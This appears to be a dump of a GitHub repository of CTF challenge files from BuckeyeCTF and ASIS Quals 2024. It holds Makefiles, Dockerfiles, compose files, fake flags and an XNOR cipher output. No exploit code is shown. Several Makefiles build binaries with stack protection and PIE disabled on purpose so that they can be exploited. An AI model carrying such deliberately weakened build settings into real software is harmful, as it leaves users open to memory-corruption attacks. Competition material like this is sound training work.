https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/images/image4.png -------------------------------------------------------------------------------- /Writeups/2024/ASIS Quals/Snoopy/snoopy.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/snoopy.pcap -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/SSFS/images/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/SSFS/images/image1.png -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/SSFS/source/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{fake_flag} 2 | -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/SSFS/source/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | gunicorn 3 | eventlet -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/color/source/Makefile: -------------------------------------------------------------------------------- 1 | all: clean color 2 | 3 | dist: clean color 4 | zip export.zip color color.c Makefile Dockerfile 5 | 6 | color: color.c 7 | gcc -w color.c -o color 8 | 9 | clean: 10 | rm -f color export.zip 11 | -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/color/source/color: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/color/source/color -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/quotes/source/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:lts AS runtime 2 | WORKDIR /app 3 | 4 | RUN npm install -g pnpm 5 | 6 | COPY package.json . 7 | COPY pnpm-lock.yaml . 8 | 9 | RUN pnpm install 10 | 11 | COPY quotes quotes 12 | COPY app.js . 13 | 14 | EXPOSE 3000 15 | ENV PORT=3000 16 | ENV NODE_ENV=production 17 | CMD ["pnpm", "start"] 18 | -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/quotes/source/README.md: -------------------------------------------------------------------------------- 1 | # quotes 2 | 3 | I'm launching 🚀 my new ✨ SaaS providing quotes 📝 as an API 💪! 4 | 5 | ## Run 6 | 7 | ``` 8 | docker build . -t quotes 9 | docker run -p 3000:3000 quotes 10 | ``` 11 | 12 | Then go to https://localhost:3000 13 | -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/reduce_cycle/png_header.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/reduce_cycle/png_header.bin -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway0/source/Makefile: -------------------------------------------------------------------------------- 1 | all: runway0.c 2 | gcc runway0.c -o runway0 -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway0/source/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | services: 2 | app: 3 | build: 4 | context: . 5 | ports: 6 | - 8001:5000 7 | privileged: true -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway0/source/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{this_is_a_fake_flag} -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway0/source/runway0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/runway0/source/runway0 -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway1/source/Makefile: -------------------------------------------------------------------------------- 1 | all: runway1.c 2 | gcc runway1.c -o runway1 -fno-stack-protector -no-pie -m32 -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway1/source/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | services: 2 | app: 3 | build: 4 | context: . 5 | ports: 6 | - 8002:5000 7 | privileged: true -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway1/source/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{this_is_a_fake_flag} -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway1/source/runway1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/runway1/source/runway1 -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway2/source/Makefile: -------------------------------------------------------------------------------- 1 | all: runway2.c 2 | gcc runway2.c -o runway2 -fno-stack-protector -no-pie -m32 -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway2/source/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | services: 2 | app: 3 | build: 4 | context: . 5 | ports: 6 | - 8003:5000 7 | privileged: true -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway2/source/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{this_is_a_fake_flag} -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway2/source/runway2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/runway2/source/runway2 -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway3/source/Makefile: -------------------------------------------------------------------------------- 1 | all: runway3.c 2 | gcc runway3.c -o runway3 -no-pie -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway3/source/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | services: 2 | app: 3 | build: 4 | context: . 5 | ports: 6 | - 8004:5000 7 | privileged: true -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway3/source/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{this_is_a_fake_flag} -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/runway3/source/runway3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/runway3/source/runway3 -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/the_CIA/_protected-cia-document.pdf.extracted/1C749: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/the_CIA/_protected-cia-document.pdf.extracted/1C749 -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/the_CIA/_protected-cia-document.pdf.extracted/1C749.zlib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/the_CIA/_protected-cia-document.pdf.extracted/1C749.zlib -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/the_CIA/protected-cia-document.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/the_CIA/protected-cia-document.pdf -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/wreck/output.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/BuckeyeCTF/wreck/output.jpg -------------------------------------------------------------------------------- /Writeups/2024/BuckeyeCTF/xnor/xnor_output.txt: -------------------------------------------------------------------------------- 1 | Key: [[REDACTED]] 2 | 3 | Message: b'Blue is greener than purple for sure!' 4 | Enrypted message: fe9d88f3d675d0c90d95468212b79e929efffcf281d04f0cfa6d07704118943da2af36b9f8 5 | 6 | Flag: [[REDACTED]] 7 | Encrypted flag: de9289f08d6bcb90359f4dd70e8d95829fc8ffaf90ce5d21f96e3d635f148a68e4eb32efa4 8 | -------------------------------------------------------------------------------- /Writeups/README.md: -------------------------------------------------------------------------------- 1 | This repo includes Challenge writeups for CTF Competitions which I Participated and Solved. 2 | --------------------------------------------------------------------------------